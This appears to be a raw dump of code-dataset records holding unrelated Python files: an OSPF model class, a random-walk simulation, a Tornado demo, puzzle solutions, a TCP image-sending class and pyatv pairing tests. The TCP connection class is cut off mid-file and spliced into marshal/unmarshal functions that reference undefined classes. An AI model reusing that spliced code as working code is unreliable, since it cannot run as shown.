Interval\"\n prop.isConfig = True\n prop.isAdmin = True\n prop.range = [(0, 5000)]\n prop.defaultValue = 0\n prop.defaultValueStr = \"0\"\n meta.props.add(\"lsaStartIntvl\", prop)\n\n prop = PropMeta(\"str\", \"maxEcmp\", \"maxEcmp\", 1088, PropCategory.REGULAR)\n prop.label = \"Max ECMP\"\n prop.isConfig = True\n prop.isAdmin = True\n prop.range = [(1, 64)]\n prop.defaultValue = 8\n prop.defaultValueStr = \"8\"\n meta.props.add(\"maxEcmp\", prop)\n\n prop = PropMeta(\"str\", \"maxLsaAction\", \"maxLsaAction\", 17808, PropCategory.REGULAR)\n prop.label = \"Action\"\n prop.isConfig = True\n prop.isAdmin = True\n prop.defaultValue = 0\n prop.defaultValueStr = \"reject\"\n prop._addConstant(\"log\", \"log\", 2)\n prop._addConstant(\"reject\", \"reject\", 0)\n prop._addConstant(\"restart\", \"restart\", 1)\n meta.props.add(\"maxLsaAction\", prop)\n\n prop = PropMeta(\"str\", \"maxLsaNum\", \"maxLsaNum\", 17803, PropCategory.REGULAR)\n prop.label = \"Maximum # of non self-generated LSAs\"\n prop.isConfig = True\n prop.isAdmin = True\n prop.range = [(1, 4294967295)]\n prop.defaultValue = 20000\n prop.defaultValueStr = \"20000\"\n meta.props.add(\"maxLsaNum\", prop)\n\n prop = PropMeta(\"str\", \"maxLsaResetIntvl\", \"maxLsaResetIntvl\", 17807, PropCategory.REGULAR)\n prop.label = \"Reset Interval\"\n prop.isConfig = True\n prop.isAdmin = True\n prop.range = [(1, 1440)]\n prop.defaultValue = 10\n prop.defaultValueStr = \"10\"\n meta.props.add(\"maxLsaResetIntvl\", prop)\n\n prop = PropMeta(\"str\", \"maxLsaSleepCnt\", \"maxLsaSleepCnt\", 17805, PropCategory.REGULAR)\n prop.label = \"Sleep Count\"\n prop.isConfig = True\n prop.isAdmin = True\n prop.range = [(1, 4294967295)]\n prop.defaultValue = 5\n prop.defaultValueStr = \"5\"\n meta.props.add(\"maxLsaSleepCnt\", prop)\n\n prop = PropMeta(\"str\", \"maxLsaSleepIntvl\", \"maxLsaSleepIntvl\", 17806, PropCategory.REGULAR)\n prop.label = \"Sleep Interval\"\n prop.isConfig = True\n prop.isAdmin = True\n prop.range = [(1, 1440)]\n prop.defaultValue = 5\n prop.defaultValueStr = \"5\"\n meta.props.add(\"maxLsaSleepIntvl\", prop)\n\n prop = PropMeta(\"str\", \"maxLsaThresh\", \"maxLsaThresh\", 17804, PropCategory.REGULAR)\n prop.label = \"Threshold\"\n prop.isConfig = True\n prop.isAdmin = True\n prop.range = [(1, 100)]\n prop.defaultValue = 75\n prop.defaultValueStr = \"75\"\n meta.props.add(\"maxLsaThresh\", prop)\n\n prop = PropMeta(\"str\", \"modTs\", \"modTs\", 7, PropCategory.REGULAR)\n prop.label = \"None\"\n prop.isImplicit = True\n prop.isAdmin = True\n prop.defaultValue = 0\n prop.defaultValueStr = \"never\"\n prop._addConstant(\"never\", \"never\", 0)\n meta.props.add(\"modTs\", prop)\n\n prop = PropMeta(\"str\", \"name\", \"name\", 4991, PropCategory.REGULAR)\n prop.label = \"Name\"\n prop.isConfig = True\n prop.isAdmin = True\n prop.range = [(0, 64)]\n prop.regex = ['[a-zA-Z0-9_.:-]+']\n meta.props.add(\"name\", prop)\n\n prop = PropMeta(\"str\", \"nameAlias\", \"nameAlias\", 28417, PropCategory.REGULAR)\n prop.label = \"Name alias\"\n prop.isConfig = True\n prop.isAdmin = True\n prop.range = [(0, 63)]\n prop.regex = ['[a-zA-Z0-9_.-]+']\n meta.props.add(\"nameAlias\", prop)\n\n prop = PropMeta(\"str\", \"ownerKey\", \"ownerKey\", 15230, PropCategory.REGULAR)\n prop.label = \"None\"\n prop.isConfig = True\n prop.isAdmin = True\n prop.range = [(0, 128)]\n prop.regex = ['[a-zA-Z0-9\\\\!#$%()*,-./:;@ _{|}~?&+]+']\n meta.props.add(\"ownerKey\", prop)\n\n prop = PropMeta(\"str\", \"ownerTag\", \"ownerTag\", 15231, PropCategory.REGULAR)\n prop.label 
= \"None\"\n prop.isConfig = True\n prop.isAdmin = True\n prop.range = [(0, 64)]\n prop.regex = ['[a-zA-Z0-9\\\\!#$%()*,-./:;@ _{|}~?&+]+']\n meta.props.add(\"ownerTag\", prop)\n\n prop = PropMeta(\"str\", \"rn\", \"rn\", 2, PropCategory.RN)\n prop.label = \"None\"\n prop.isRn = True\n prop.isImplicit = True\n prop.isAdmin = True\n prop.isCreateOnly = True\n meta.props.add(\"rn\", prop)\n\n prop = PropMeta(\"str\", \"spfHoldIntvl\", \"spfHoldIntvl\", 1091, PropCategory.REGULAR)\n prop.label = \"Max Hold Interval\"\n prop.isConfig = True\n prop.isAdmin = True\n prop.range = [(1, 600000)]\n prop.defaultValue = 1000\n prop.defaultValueStr = \"1000\"\n meta.props.add(\"spfHoldIntvl\", prop)\n\n prop = PropMeta(\"str\", \"spfInitIntvl\", \"spfInitIntvl\", 1090, PropCategory.REGULAR)\n prop.label = \"Initial Delay Interval\"\n prop.isConfig = True\n prop.isAdmin = True\n prop.range = [(1, 600000)]\n prop.defaultValue = 200\n prop.defaultValueStr = \"200\"\n meta.props.add(\"spfInitIntvl\", prop)\n\n prop = PropMeta(\"str\", \"spfMaxIntvl\", \"spfMaxIntvl\", 1092, PropCategory.REGULAR)\n prop.label = \"Min Wait Time\"\n prop.isConfig = True\n prop.isAdmin = True\n prop.range = [(1, 600000)]\n prop.defaultValue = 5000\n prop.defaultValueStr = \"5000\"\n meta.props.add(\"spfMaxIntvl\", prop)\n\n prop = PropMeta(\"str\", \"status\", \"status\", 3, PropCategory.STATUS)\n prop.label = \"None\"\n prop.isImplicit = True\n prop.isAdmin = True\n prop._addConstant(\"created\", \"created\", 2)\n prop._addConstant(\"deleted\", \"deleted\", 8)\n prop._addConstant(\"modified\", \"modified\", 4)\n meta.props.add(\"status\", prop)\n\n def __init__(self, parentMoOrDn, markDirty=True, **creationProps):\n namingVals = []\n Mo.__init__(self, parentMoOrDn, markDirty, *namingVals, **creationProps)\n\n\n\n# End of package file\n# ##################################################\n","sub_path":"venv/Lib/site-packages/cobra/modelimpl/ospf/ctxdef.py","file_name":"ctxdef.py","file_ext":"py","file_size_in_byte":11594,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"549083001","text":"import random\nimport numpy as np\nimport matplotlib.pyplot as plt\ndef randpath(T):\n x=[0]\n t=[0]\n x2ave=[0]*T\n for i in range(T):\n c=random.random()\n t.append(i+1)\n if c<=0.5:\n x.append(x[-1]+1)\n else:\n x.append(x[-1]-1)\n x2ave[i]=x2ave[i]+x[-1]**2\n return x,t,x2ave\nx,t,x2ave=randpath(100)\nx1,t1,x2ave1=randpath(100)\nfig = plt.figure(figsize=(10, 5))\nplt.plot(t,x,'o',ms=4,color='red')\nplt.plot(t1,x1,'o',ms=4,color='blue')\nplt.xlabel('time(step number)')\nplt.ylabel('X')\nplt.title('random walk in one dimension')\n\n\n#----------\naverage=[0]*101\nfor i in range(5000):\n x1,t1,x2ave1=randpath(100)\n for j in range(len(x1)):\n average[j]=average[j]+x1[j]/5000\nplt.figure(figsize=(10,5))\nplt.ylim(-0.5,0.5)\nplt.grid()\nplt.plot(t1,average)\nplt.xlabel('time(step number)')\nplt.ylabel('')\nplt.title('random walk in one dimension')\nplt.text(0,0.15,' versus time')\n#-----------\\\nx2ave=[0]*100\nfor i in range(5000):\n x1,t1,x2ave1=randpath(100)\n for j in range(len(x1)-1):\n x2ave[j]=x2ave[j]+x2ave1[j]/5000\nplt.figure(figsize=(10,5))\nplt.grid()\nt0=[]\nfor i in range(100):\n t0.append(i+1)\nplt.plot(t0,x2ave,'o',ms=3)\nplt.xlabel('time(step number)')\nplt.ylabel('')\nplt.title('random walk in one dimension')\nplt.text(10,80,' versus time')\nk,b=np.polyfit(t0,x2ave,1)#多项式拟合\nideal=[]\nfor i in range(100):\n 
ideal.append(k*(i+1)+b)\nplt.plot(t0,ideal,color='red')\nprint(k,b)\n#------\nx4ave=[0]*100\nfor i in range(5000):\n x1,t1,x2ave1=randpath(100)\n for j in range(len(x1)-1):\n x4ave[j]=x4ave[j]+x1[j+1]**4/5000\n\nplt.figure(figsize=(10,5))\nplt.grid()\nplt.plot(t0,x4ave,'o',ms=3)\nplt.xlabel('time(step number)')\nplt.ylabel('')\nplt.title('random walk in one dimension')\na,b,c=np.polyfit(t0,x4ave,2)\nideal4=[]\nfor i in range(100):\n ideal4.append(a*i**2+b*i+c)\nplt.plot(t0,ideal4,color='red')\nplt.text(20,20000,'versus time')\nprint(a,b,c)\n \n \n \n\n\n \n\n\n\n","sub_path":"final/randpath副本.py","file_name":"randpath副本.py","file_ext":"py","file_size_in_byte":1985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"420843605","text":"\"\"\"\nGets contextual information about the occurences of words and\ngroup by word.\n\nThe query expects a file with a list of the words to search for, one\nper line.\n\nWords are normalized, by removing all 'a-z|A-Z' characters before\ncomparing with the list of words to search for.\n\nThe result is of form, for example:\n\n WORD:\n - { \"title\": TITLE,\n \"place\": PLACE,\n \"publisher\": PUBLISHER,\n \"page\": PAGE,\n \"text\": TEXT,\n \"year\": YEAR }\n - { ... }\n ...\n WORD:\n ...\n\"\"\"\n\nfrom defoe.alto import utils\n\n\ndef do_query(archives, words_file, logger=None):\n \"\"\"\n Gets contextual information about the occurences of words\n and group by word.\n\n @param archives: Archives holding Documents\n @type archives: pyspark.rdd.PipelinedRDD with Archives.\n @param words_file: File with list of words to search for,\n one per line\n @type words_file: str or unicode\n @param logger: Logger\n \"\"\"\n search_words = []\n with open(words_file, \"r\") as f:\n search_words = [word.strip() for word in list(f)]\n\n documents = archives.flatMap(\n lambda archive: [document for document in list(archive)])\n\n words = documents.flatMap(\n lambda document: [\n (document, page, utils.normalize(word))\n for (page, word) in document.scan_words()\n ])\n\n filtered_words = words.filter(\n lambda document_page_word: document_page_word[2] in search_words)\n\n words_and_context = filtered_words.map(\n lambda document_page_word:\n (document_page_word[2],\n {\"title\": document_page_word[0].title,\n \"place\": document_page_word[0].place,\n \"publisher\": document_page_word[0].publisher,\n \"page\": document_page_word[1].code,\n \"text\": document_page_word[1].content,\n \"year\": document_page_word[0].year}))\n\n result = words_and_context \\\n .groupByKey() \\\n .map(lambda word_context:\n (word_context[0], list(word_context[1]))) \\\n .collect()\n return result\n","sub_path":"defoe/alto/queries/find_words_context_group_by_word.py","file_name":"find_words_context_group_by_word.py","file_ext":"py","file_size_in_byte":2045,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"215247700","text":"import tornado.ioloop # 核心io循环模块,封装linux的epoll和BSD的kqueue, tornado高性能处理的核心。\nimport tornado.web # tornado的基础web框架\nimport tornado.httpserver # httpserver监听端口\nimport tornado.options\nfrom tornado.options import define, options\n\n#定义端口配置\ndefine('port', type=int, default=8080)\n\n#创建视图\nclass MainHandler(tornado.web.RequestHandler):\n def get(self):\n self.write(\"
hello,world
\")\n\n#创建路由表\nurls = [\n (r\"/\", MainHandler),\n (r'/index',MainHandler)\n]\n\n#创建配置-开启调试模式\nconfigs = dict(debug=True)\n\n#自定义应用\nclass MyApplication(tornado.web.Application):\n def __init__(self, urls, configs):\n super(MyApplication, self).__init__(handlers=urls, **configs)\n\n#创建服务器\ndef make_app():\n tornado.options.parse_command_line()\n http_server = tornado.httpserver.HTTPServer(MyApplication(urls,configs))\n http_server.listen(options.port)\n tornado.ioloop.IOLoop.current().start()\n\n#启动服务器\nif __name__ == '__main__':\n make_app()\n","sub_path":"7_Demo_Tornado/2_Tornado_Code/1_Tornado_FirstApp/1_Tornado_urls.py","file_name":"1_Tornado_urls.py","file_ext":"py","file_size_in_byte":1097,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"398302311","text":"#!/usr/bin/python3\nfrom sys import stdin\n\ndef max_len (prefix, n):\n for i in range (1, n + 1):\n prefix [i] += prefix [i - 1]\n indices = list (range (n + 1))\n indices.sort (key = lambda x: prefix [x])\n min_val = float (\"inf\")\n cnt = 0\n ans = 0\n for i in indices:\n nans = i - min_val\n if ans < nans:\n cnt = 1\n ans = nans\n elif ans == nans: cnt += 1\n min_val = i if i < min_val else min_val\n if cnt: print (ans, cnt)\n else: print (-1)\n\ndef main ():\n read = stdin.readline\n n = int (read ())\n a = [0] + list (map (int, read ().split ()))\n max_len (a, n)\n\nif __name__ == \"__main__\": main ()\n","sub_path":"_mehta_and_subarrays.py","file_name":"_mehta_and_subarrays.py","file_ext":"py","file_size_in_byte":682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"30480478","text":"#________________________________________________\n#Inches to Feet converter\n#Author: Andrew Simonson and Natheniel Goldstien\n#________________________________________________\n\n\n#Get input\nininches = input(\"input your height in inches\")\n#Convert string to float\ninches = float(ininches)\n#Find number of feet total\nNumOfFeet = int(inches // 12)\n#Find remainder of inches\nNumOfInches = inches - (NumOfFeet * 12)\nprint(\"You are\" , NumOfFeet , \"feet and\" , NumOfInches , \"inches tall.\")\n\n\n\n\n","sub_path":"AP-CSP (Python)/InchesToFeet.py","file_name":"InchesToFeet.py","file_ext":"py","file_size_in_byte":487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"534061193","text":"from datetime import datetime\r\nfrom termcolor import colored\r\n\r\nclass Spy:\r\n\r\n def __init__(self, name, salutation, age, rating):\r\n self.name = name\r\n self.salutation = salutation\r\n self.age = age\r\n self.rating = rating\r\n self.is_online = True\r\n self.chats = []\r\n self.current_status_message = None\r\n self.chats_avg = [0, 0]\r\n\r\n\r\nclass ChatMessage:\r\n\r\n def __init__(self,message,sent_by_me):\r\n self.message = message\r\n self.time = datetime.now()\r\n self.sent_by_me = sent_by_me\r\n\r\nspy = Spy('riya', 'Ms.', 24, 4)\r\n\r\nfriend_1 = Spy('Ishu', 'Mr.', 20, 7)\r\nfriend_2 = Spy('Neha', 'Ms.', 19, 2)\r\nfriend_3 = Spy('Shikha', 'Ms.',20, 3)\r\nfriend_4=Spy('Kirti','Ms.',20,8)\r\n\r\n\r\nfriends = [friend_1, friend_2, friend_3,friend_4]","sub_path":"spy_details.py","file_name":"spy_details.py","file_ext":"py","file_size_in_byte":800,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"165799705","text":"import math\r\ndef judge(list):\r\n#X表示半径,L表示油量,Z表示圆心角\r\n for vari in list:\r\n X = int(vari[0])\r\n L = 
int(vari[1])\r\n Z = int(vari[2])\r\n if Z > 180:\r\n Z = 360 - Z\r\n else:\r\n Z = Z\r\n Oil = int(L) * 5\r\n #print(type(Oil))\r\n if Oil >= int(Z) * math.pi * int(X) * 2 / 180:\r\n print(\"YES\")\r\n else:\r\n print(\"NO\")\r\na = int(input())\r\nvarilist = []\r\nfor b in range(a):\r\n vari = input().split()\r\n varilist.append(vari)\r\n#print(varilist)\r\njudge(varilist)\r\n\r\n'''\r\n有一条圆形公路,半径为X个单位。Noder的家在这条公路上,\r\n有一个超市也在这条公路上。家和超市所形成的圆心角为Z度。\r\n现在车子上有L升油,一升油能开5个单位的路程。\r\n问Noder用这L升油能不能先从家开到超市购物,然后再从超市回家。\r\n\r\n条件题,需要注意的是当圆心角大于180度时车子是逆时针行走,\r\n需要将圆心角转成小于180度\r\n而且是往返,注意路程要乘2\r\nInput:\r\n2\r\n1 100 0\r\n10 0 1\r\nOutput:\r\nYES\r\nNO\r\n'''","sub_path":"基础题/1916购物.py","file_name":"1916购物.py","file_ext":"py","file_size_in_byte":1126,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"190447245","text":"# coding=utf-8\n# Copyright 2015 Pants project contributors (see CONTRIBUTORS.md).\n# Licensed under the Apache License, Version 2.0 (see LICENSE).\n\nfrom __future__ import (absolute_import, division, generators, nested_scopes, print_function,\n unicode_literals, with_statement)\n\nimport os\nfrom textwrap import dedent\n\nfrom pants.backend.jvm.targets.jar_dependency import JarDependency\nfrom pants.backend.jvm.targets.jar_library import JarLibrary\nfrom pants.build_graph.build_file_aliases import BuildFileAliases\nfrom pants.build_graph.target import Target\nfrom pants_test.jvm.jvm_tool_task_test_base import JvmToolTaskTestBase\n\nfrom pants.contrib.spindle.targets.spindle_thrift_library import SpindleThriftLibrary\nfrom pants.contrib.spindle.tasks.spindle_gen import SpindleGen\n\n\nclass SpindleGenTest(JvmToolTaskTestBase):\n @classmethod\n def task_type(cls):\n return SpindleGen\n\n @property\n def alias_groups(self):\n return BuildFileAliases(\n targets={\n 'spindle_thrift_library': SpindleThriftLibrary,\n 'jar_library': JarLibrary,\n 'target': Target,\n },\n objects={\n 'jar': JarDependency,\n })\n\n def test_smoke(self):\n contents = dedent(\"\"\"namespace java org.pantsbuild.example\n struct Example {\n 1: optional i64 number\n }\n \"\"\")\n\n self.create_file(relpath='test_smoke/a.thrift', contents=contents)\n\n self.add_to_build_file('3rdparty', dedent(\"\"\"\n jar_library(\n name = 'spindle-runtime',\n jars = [\n jar(org = 'com.foursquare', name = 'spindle-runtime_2.10', rev = '3.0.0-M7'),\n ],\n )\n \"\"\"\n ))\n\n self.make_target(spec='test_smoke:a',\n target_type=SpindleThriftLibrary,\n sources=['a.thrift'])\n\n target = self.target('test_smoke:a')\n context = self.context(target_roots=[target])\n\n task = self.execute(context)\n\n build_path = os.path.join(task.workdir,\n 'src',\n 'jvm',\n 'org',\n 'pantsbuild',\n 'example')\n\n java_exists = os.path.isfile(os.path.join(build_path, 'java_a.java'))\n scala_exists = os.path.isfile(os.path.join(build_path, 'a.scala'))\n self.assertTrue(java_exists)\n self.assertTrue(scala_exists)\n","sub_path":"contrib/spindle/tests/python/pants_test/contrib/spindle/tasks/test_spindle_gen.py","file_name":"test_spindle_gen.py","file_ext":"py","file_size_in_byte":2362,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"475746932","text":"import socket\nimport cv2\nimport numpy\n\nfrom threading import Thread\nfrom subprocess import call\n\nSIZE_LEN = 10\n\n### Error fixing consts ###\nREQUEST_SHOT_MSG = \"please take photo\"\nMOVE_MSG = \"move\"\nRIGHT = \"0\"\nLEFT = \"1\"\nCLOSE = \"close\"\n\nLAPTOP_IP = '192.168.43.185'\nGATEWAY 
= '192.168.43.1'\nSUBNET_MASK = '255.255.255.0'\nSEND_TIMEOUT = 20.0 #seconds\nLISTEN_TIMEOUT = 1000.0\nIM_SIZE = 8192000\nSENDER = True\nLISTENER = False\nPORT = 5000\n\"\"\"\nThis class provides sender and receiver TCP services,\nsender is nonblocking while receiver obviously is.\n\"\"\"\nclass connection:\n\n    def __init__(self, type, port=PORT):\n        while True:\n            try:\n                if(type == SENDER):\n                    self.timeout = SEND_TIMEOUT\n                    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n                    s.settimeout(self.timeout)\n                    s.connect((LAPTOP_IP, port))\n                    print(\"Connected to GUI!\")\n                    self.socket = s\n                else:\n                    ## fix ip ##\n                    # call(\"netsh interface ip set address name=\\\"Wireless \"\n                    #      \"Network\"\n                    #      \"Connection 2\\\" static \" +LAPTOP_IP + \" \" +\n                    #      SUBNET_MASK + \" \" + GATEWAY)\n                    self.timeout = LISTEN_TIMEOUT\n                    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n                    s.bind((\"\", port))\n                    self.sock = s\n                    self.sock.settimeout(self.timeout)\n                    self.sock.listen(1)\n                    sender, address = self.sock.accept()\n                    print(\"Successfully connected to pi: \", address)\n                    self.socket = sender\n                break\n            except:\n                pass\n                #print(\"Failed to connect to GUI!\")\n        self.thread = None\n\n    def send_image(self, img):\n        def really_send(img):\n            try:\n                self.socket.settimeout(SEND_TIMEOUT)\n                str_encode = cv2.imencode('.jpg', img)[1].tobytes()\n                print('sending img message of size ' + str(len(str_encode)))\n                self.send_data(str_encode)\n            except:\n                print(\"failed to send image <:-(\")\n\n        if self.thread is not None:\n            self.thread.join()\n\n        self.thread = Thread(target = really_send, args = (img,))\n        self.thread.start()\n\n    def send_msg(self, msg):\n        def really_send(msg):\n            try:\n                self.socket.settimeout(SEND_TIMEOUT)\n                self.send_data(msg.encode())\n            except:\n                print(\"failed to send msg <:-(\")\n\n        if self.thread is not None:\n            self.thread.join()\n\n        self.thread = Thread(target=really_send, args=(msg,))\n        self.thread.start()\n\n    def get_image(self):\n        self.socket.settimeout(LISTEN_TIMEOUT)\n        while True:\n            msg = self.recv_data()\n            decoded = numpy.frombuffer(msg, numpy.uint8)\n            img = cv2.imdecode(decoded,\n                               cv2.IMREAD_COLOR)\n            if not (img is None):\n                return img\n\n    def get_msg(self):\n        self.socket.settimeout(LISTEN_TIMEOUT)\n        while True:\n            msg = str(self.recv_data())\n            if not (msg is None):\n                return msg\n\n\n    def send_data(self, data):\n        datalen = str(len(data)).ljust(SIZE_LEN)\n        data_final = datalen.encode()+data\n        len_sent = 0\n        while len_sent < len(data_final):\n            len_sent += self.socket.send(data_final[len_sent:])\n\n\nfrom typing import Any\n\n\ndef marshal(data, mask: bytes=None, random=False) -> bytes:\n    \"\"\"\n    convert data to bytes\n    mask - some mask to be applied on marshaled data\n    \"\"\"\n    c = Coder(data, random=random)\n    c.magic()\n    if mask is None:\n        return c.export()\n    else:\n        data = c.export()\n        return bytes([data[i] ^ mask[i % len(mask)] for i in range(len(data))])\n\n\ndef unmarshal(data: bytes=None, fd=None, mask: bytes=None) -> Any:\n    \"\"\"\n    convert data as bytes() or from fd {interface : read() }\n    \"\"\"\n    if data is None and fd is None:\n        raise ValueError('Expected param \"data\" or \"fd\"')\n    if data is not None and all(map(lambda x: not isinstance(data, x), {bytes, str})):\n        raise ValueError(f'Unexpected type of \"data\" ({type(data)}), expected bytes or str')\n    return Parser(\n        mask=mask,\n        fd=fd,\n        data=data\n    ).magic().export()\n","sub_path":"k2/utils/art/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1005,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"57422529","text":"import jsonpickle\n\nimport tools.file_management as file_management\n\nfrom App.scene_container import 
SceneContainer\n\n\nclass Thing:\n    def __init__(self, value):\n        self.v = value\n\n\ndef main():\n    obj = Thing([\"a\", 1, 1.2123231, complex(1, 1), [1, 0, 0]])\n    # open_4_unique_save\n    # , note = \"test\"\n    # open()\n    # Need to write this via a function first\n    note = \"test\"\n    with file_management.open_4_unique_save(\"test.json\", mode=\"w\", note=note) as file:\n        pickled = jsonpickle.encode(obj, make_refs=True, indent=4)\n        file.write(pickled)\n    print(f\"file is {'not ' if not file.closed else ''}closed\")\n\n\ndef trace_load():\n    file_name = r\"D:\\Projects\\Python\\Raytracing\\saves\\2021\\09\\16\\17_43_54_efficiency_divergen_angle\\(1_ 1,01).json\"\n    d = SceneContainer.load_json_to_dict(file_name)\n    pretty = SceneContainer.get_readable_str_data_from_dict(d)\n    print(pretty)\n\n\nif __name__ == '__main__':\n    # main()\n    trace_load()\n","sub_path":"scripts/testing/file_saves_test.py","file_name":"file_saves_test.py","file_ext":"py","file_size_in_byte":986,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"323970105","text":"\"\"\"Test suite for the pairing process with Apple TV.\"\"\"\n\nimport asynctest\nimport ipaddress\n\nfrom pyatv import conf\nfrom pyatv.dmap import (pairing, parser, tag_definitions)\nfrom tests import zeroconf_stub, utils\n\n\nREMOTE_NAME = 'pyatv remote'\n\n# This is a valid config for default pairing guid\nPIN_CODE = 1234\nPAIRING_GUID = '0x0000000000000001'\nPAIRING_CODE = '690E6FF61E0D7C747654A42AED17047D'\n\n# This is valid for some other (non-default) config\nPIN_CODE2 = 5555\nPAIRING_GUID2 = '0x1234ABCDE56789FF'\nPAIRING_CODE2 = '58AD1D195B6DAA58AA2EA29DC25B81C3'\n\n# Code is padded with zeros\nPIN_CODE3 = 1\nPAIRING_GUID3 = '0x7D1324235F535AE7'\nPAIRING_CODE3 = 'A34C3361C7D57D61CA41F62A8042F069'\n\n# Pairing guid is 8 bytes, which is 64 bits\nRANDOM_128_BITS = 6558272190156386627\nRANDOM_PAIRING_GUID = '0x5B03A9CF4A983143'\nRANDOM_PAIRING_CODE = '7AF2D0B8629DE3C704D40A14C9E8CB93'\n\n\nclass PairingTest(asynctest.TestCase):\n\n    async def setUp(self):\n        self.service = conf.DmapService(None, None)\n        self.config = conf.AppleTV('Apple TV', '127.0.0.1')\n        self.config.add_service(self.service)\n        self.zeroconf = zeroconf_stub.stub(pairing)\n        self.pairing = None\n\n        # TODO: currently stubs internal method, should provide stub\n        # for netifaces later\n        pairing._get_private_ip_addresses = \\\n            lambda: [ipaddress.ip_address('10.0.0.1')]\n\n    async def tearDown(self):\n        await self.pairing.finish()\n\n    async def _start(self,\n                     pin_code=PIN_CODE,\n                     pairing_guid=PAIRING_GUID,\n                     name=REMOTE_NAME):\n        options = {'zeroconf': self.zeroconf}\n        if pairing_guid:\n            options['pairing_guid'] = pairing_guid\n        if name:\n            options['name'] = name\n\n        self.pairing = pairing.DmapPairingHandler(\n            self.config, None, self.loop, **options)\n        await self.pairing.begin()\n        self.pairing.pin(pin_code)\n\n    async def test_zeroconf_service_published(self):\n        await self._start()\n\n        self.assertEqual(len(self.zeroconf.registered_services), 1,\n                         msg='no zeroconf service registered')\n\n        service = self.zeroconf.registered_services[0]\n        self.assertEqual(service.properties[b'DvNm'], REMOTE_NAME,\n                         msg='remote name does not match')\n\n    async def test_succesful_pairing(self):\n        await self._start()\n\n        url = self._pairing_url(PAIRING_CODE)\n        data, _ = await utils.simple_get(url)\n\n        await self.pairing.finish()\n\n        # Verify content returned in pairingresponse\n        parsed = parser.parse(data, tag_definitions.lookup_tag)\n        self.assertEqual(parser.first(parsed, 'cmpa', 
'cmpg'), 1)\n        self.assertEqual(parser.first(parsed, 'cmpa', 'cmnm'), REMOTE_NAME)\n        self.assertEqual(parser.first(parsed, 'cmpa', 'cmty'), 'iPhone')\n\n        self.assertEqual(self.service.credentials, PAIRING_GUID)\n\n    async def test_successful_pairing_random_pairing_guid_generated(self):\n        pairing.random.getrandbits = lambda x: RANDOM_128_BITS\n\n        await self._start(pairing_guid=None)\n\n        url = self._pairing_url(RANDOM_PAIRING_CODE)\n        await utils.simple_get(url)\n\n        await self.pairing.finish()\n\n        self.assertEqual(self.service.credentials, RANDOM_PAIRING_GUID)\n\n    async def test_succesful_pairing_with_any_pin(self):\n        await self._start(pin_code=None)\n\n        url = self._pairing_url('invalid_pairing_code')\n        _, status = await utils.simple_get(url)\n\n        self.assertEqual(status, 200)\n\n    async def test_succesful_pairing_with_pin_leadering_zeros(self):\n        await self._start(pin_code=PIN_CODE3, pairing_guid=PAIRING_GUID3)\n\n        url = self._pairing_url(PAIRING_CODE3)\n        _, status = await utils.simple_get(url)\n\n        self.assertEqual(status, 200)\n\n    async def test_pair_custom_pairing_guid(self):\n        await self._start(pin_code=PIN_CODE2, pairing_guid=PAIRING_GUID2)\n\n        url = self._pairing_url(PAIRING_CODE2)\n        data, _ = await utils.simple_get(url)\n\n        await self.pairing.finish()\n\n        # Verify content returned in pairingresponse\n        parsed = parser.parse(data, tag_definitions.lookup_tag)\n        self.assertEqual(parser.first(parsed, 'cmpa', 'cmpg'),\n                         int(PAIRING_GUID2, 16))\n\n        self.assertEqual(self.service.credentials, PAIRING_GUID2)\n\n    async def test_failed_pairing(self):\n        await self._start()\n\n        url = self._pairing_url('wrong')\n        _, status = await utils.simple_get(url)\n\n        self.assertEqual(status, 500)\n\n    def _pairing_url(self, pairing_code):\n        service = self.zeroconf.registered_services[0]\n        server = 'http://127.0.0.1:{}'.format(service.port)\n        return '{}/pairing?pairingcode={}&servicename=test'.format(\n            server, pairing_code)\n","sub_path":"tests/dmap/test_pairing.py","file_name":"test_pairing.py","file_ext":"py","file_size_in_byte":4863,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"262199023","text":"def largestArea(arr,n)->int:\r\n    res = 0\r\n    ps = [0]*n\r\n    ns = [0]*n\r\n    stack = []\r\n    stack.append(0)\r\n    for i in range(n):\r\n        # keep popping until the nearest strictly smaller bar remains (must be a loop, not a single pop)\r\n        while (len(stack) > 0) and arr[stack[-1]]>=arr[i]:\r\n            stack.pop()\r\n        if len(stack) > 0:\r\n            ps[i] = stack[-1]\r\n        else:\r\n            ps[i] = -1\r\n        stack.append(i)\r\n    \r\n    stack = []\r\n    stack.append(n-1)\r\n    for i in range(n-1,-1,-1):\r\n        while (len(stack) > 0) and arr[stack[-1]]>=arr[i]:\r\n            stack.pop()\r\n        if len(stack) > 0:\r\n            ns[i] = stack[-1]\r\n        else:\r\n            ns[i] = n\r\n        stack.append(i)\r\n    for i in range(n):\r\n        curr = arr[i]\r\n        curr += (i-1-ps[i])*arr[i]\r\n        curr += (ns[i]-i-1)*arr[i]\r\n        res = max(curr,res)\r\n    \r\n    return res\r\n    \r\n    \r\ndef maximalRectangle(matrix) -> int:\r\n    \r\n    row = len(matrix)\r\n    col = len(matrix[0])\r\n    for i in range(row):\r\n        for j in range(col):\r\n            matrix[i][j] = int(matrix[i][j])\r\n    res = largestArea(matrix[0],col)\r\n    for i in range(1,row):\r\n        for j in range(col):\r\n            if(matrix[i][j] == 1):\r\n                matrix[i][j] += matrix[i-1][j]\r\n        res = max(res,largestArea(matrix[i],col))\r\n    return res\r\n\r\n\r\nmatrix = 
